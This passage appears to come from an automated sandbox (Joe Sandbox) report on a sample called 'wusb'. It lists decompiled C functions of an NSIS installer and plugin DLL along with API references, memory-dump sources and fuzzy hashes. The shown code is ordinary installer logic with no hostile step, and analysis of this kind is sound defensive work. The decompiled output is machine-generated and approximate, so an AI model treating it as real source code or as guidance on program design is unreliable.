				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x418ea0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42a210;
						if(_t2 >  *0x42a210) {
							_t3 = CreateDialogParamW( *0x42a200, 0x6f, 0, E00402DD7, 0);
							 *0x418ea0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406662(0);
					}
				} else {
					_t6 =  *0x418ea0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x418ea0 = 0;
					return _t6;
				}
			}






                                                        0x00402e64
                                                        0x00402e7e
                                                        0x00402e84
                                                        0x00402e8e
                                                        0x00402e94
                                                        0x00402e9a
                                                        0x00402eab
                                                        0x00402eb4
                                                        0x00000000
                                                        0x00402eb9
                                                        0x00402ec0
                                                        0x00402e86
                                                        0x00402e8d
                                                        0x00402e8d
                                                        0x00402e66
                                                        0x00402e66
                                                        0x00402e6d
                                                        0x00402e70
                                                        0x00402e70
                                                        0x00402e76
                                                        0x00402e7d
                                                        0x00402e7d

                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                        • GetTickCount.KERNEL32 ref: 00402E8E
                                                        • CreateDialogParamW.USER32 ref: 00402EAB
                                                        • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                        • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                                        • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                        • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405C25 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 53%
                                                        			E00405C25(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040624C(0x425ef0, _a4);
				_t21 = E00405BC8(0x425ef0);
				if(_t21 != 0) {
					E004064E0(_t21);
					if(( *0x42a21c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425ef0 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425ef0);
							_push(0x425ef0);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040658F();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B69(0x425ef0);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B1D();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                        0x00405c31
                                                        0x00405c3c
                                                        0x00405c40
                                                        0x00405c47
                                                        0x00405c53
                                                        0x00405c63
                                                        0x00405c65
                                                        0x00405c7d
                                                        0x00405c7e
                                                        0x00405c85
                                                        0x00405c86
                                                        0x00000000
                                                        0x00000000
                                                        0x00405c69
                                                        0x00405c70
                                                        0x00405c78
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405c70
                                                        0x00405c88
                                                        0x00000000
                                                        0x00405c9c
                                                        0x00405c55
                                                        0x00405c5b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405c5b
                                                        0x00405c42
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                          • Part of subcall function 00405BC8: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,?,00405C3C,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,?,?,766DFAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,766DFAA0,00000000), ref: 00405BD6
                                                          • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                          • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr743A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,?,?,766DFAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,766DFAA0,00000000), ref: 00405C7E
                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,?,?,766DFAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,766DFAA0), ref: 00405C8E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsr743A.tmp
                                                        • API String ID: 3248276644-3880677739
                                                        • Opcode ID: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
                                                        • Instruction ID: 8cd04150762c6b8d6a28599447491585beeb2d0428c1c24898b3a9decc440bb2
                                                        • Opcode Fuzzy Hash: c400ef1d1e731d117cbda643fc4ffe8eac790fafe02a6f7d9a7793559b5b74a4
                                                        • Instruction Fuzzy Hash: 0BF0F42910DF1115E226323A1D0AEAF1555CE83364B4E053FF851B22C5DE3C9A538DAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 89%
                                                        			E00405224(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x4236d4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x4236d4 = _t16;
							E00404BFA();
						}
						L11:
						return CallWindowProcW( *0x4236dc, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404B7A(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040422D(0x413);
				return 0;
			}





                                                        0x00405228
                                                        0x00405232
                                                        0x0040524e
                                                        0x00405270
                                                        0x00405273
                                                        0x00405279
                                                        0x00405283
                                                        0x00405284
                                                        0x00405286
                                                        0x0040528c
                                                        0x0040528c
                                                        0x00405296
                                                        0x00000000
                                                        0x004052a4
                                                        0x0040525b
                                                        0x00405293
                                                        0x00405293
                                                        0x00000000
                                                        0x00405293
                                                        0x00405267
                                                        0x00405269
                                                        0x00000000
                                                        0x00405269
                                                        0x00405238
                                                        0x00000000
                                                        0x00000000
                                                        0x0040523f
                                                        0x00000000

                                                        APIs
                                                        • IsWindowVisible.USER32 ref: 00405253
                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                                          • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                        • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                                        • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                        • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004038C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004038C5() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216ac;
				_t3 = E004038AA(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216ac =  *0x4216ac & 0x00000000;
				return _t3;
			}







                                                        0x004038c6
                                                        0x004038ce
                                                        0x004038d5
                                                        0x004038d8
                                                        0x004038d8
                                                        0x004038da
                                                        0x004038df
                                                        0x004038e6
                                                        0x004038ec
                                                        0x004038f0
                                                        0x004038f1
                                                        0x004038f9

                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,766DFAA0,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                                        • GlobalFree.KERNEL32 ref: 004038E6
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-823278215
                                                        • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                        • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
                                                        • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                        • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E00405B69(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                        0x00405b6a
                                                        0x00405b74
                                                        0x00405b77
                                                        0x00405b7d
                                                        0x00405b7e
                                                        0x00405b7f
                                                        0x00405b87
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405b87
                                                        0x00405b89
                                                        0x00405b91

                                                        APIs
                                                        • lstrlenW.KERNEL32(00438800,C:\Users\Public,00402F2D,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                                        • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\Public,00402F2D,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\Public
                                                        • API String ID: 2709904686-2272764151
                                                        • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                        • Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
                                                        • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                        • Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}





















                                                        0x100010e6
                                                        0x100010f0
                                                        0x100010ff
                                                        0x1000110e
                                                        0x10001119
                                                        0x1000111c
                                                        0x1000112b
                                                        0x1000112f
                                                        0x10001131
                                                        0x100011d8
                                                        0x100011de
                                                        0x10001137
                                                        0x10001138
                                                        0x10001138
                                                        0x1000113d
                                                        0x1000113e
                                                        0x10001140
                                                        0x10001143
                                                        0x1000120d
                                                        0x10001210
                                                        0x100011b0
                                                        0x100011b6
                                                        0x100011bf
                                                        0x100011c4
                                                        0x100011c7
                                                        0x00000000
                                                        0x100011c7
                                                        0x10001212
                                                        0x10001214
                                                        0x10001196
                                                        0x1000119d
                                                        0x100011a5
                                                        0x00000000
                                                        0x100011a5
                                                        0x10001161
                                                        0x10001162
                                                        0x1000116a
                                                        0x10001177
                                                        0x1000117f
                                                        0x10001188
                                                        0x1000118d
                                                        0x1000118d
                                                        0x00000000
                                                        0x10001162
                                                        0x10001149
                                                        0x100011df
                                                        0x100011df
                                                        0x100011e6
                                                        0x100011f3
                                                        0x100011f8
                                                        0x100011fb
                                                        0x10001203
                                                        0x10001205
                                                        0x10001205
                                                        0x00000000
                                                        0x100011e6
                                                        0x1000114f
                                                        0x10001152
                                                        0x00000000
                                                        0x00000000
                                                        0x10001158
                                                        0x1000115b
                                                        0x100011ac
                                                        0x00000000
                                                        0x100011ac
                                                        0x1000115d
                                                        0x1000115f
                                                        0x10001192
                                                        0x00000000
                                                        0x10001192
                                                        0x00000000
                                                        0x100011c9
                                                        0x100011c9
                                                        0x100011d3
                                                        0x00000000
                                                        0x100011d7

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.677589038.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.677505776.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677602813.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677619149.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                        • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                        • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                        • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405CA3(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                        0x00405cb3
                                                        0x00405cb5
                                                        0x00405cb8
                                                        0x00405ce4
                                                        0x00405cbd
                                                        0x00405cc6
                                                        0x00405ccb
                                                        0x00405cd6
                                                        0x00405cd9
                                                        0x00405cf5
                                                        0x00405cdb
                                                        0x00405ce2
                                                        0x00000000
                                                        0x00405ce2
                                                        0x00405cee
                                                        0x00405cf2
                                                        0x00405cf2
                                                        0x00405cec
                                                        0x00000000

                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                                                        • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
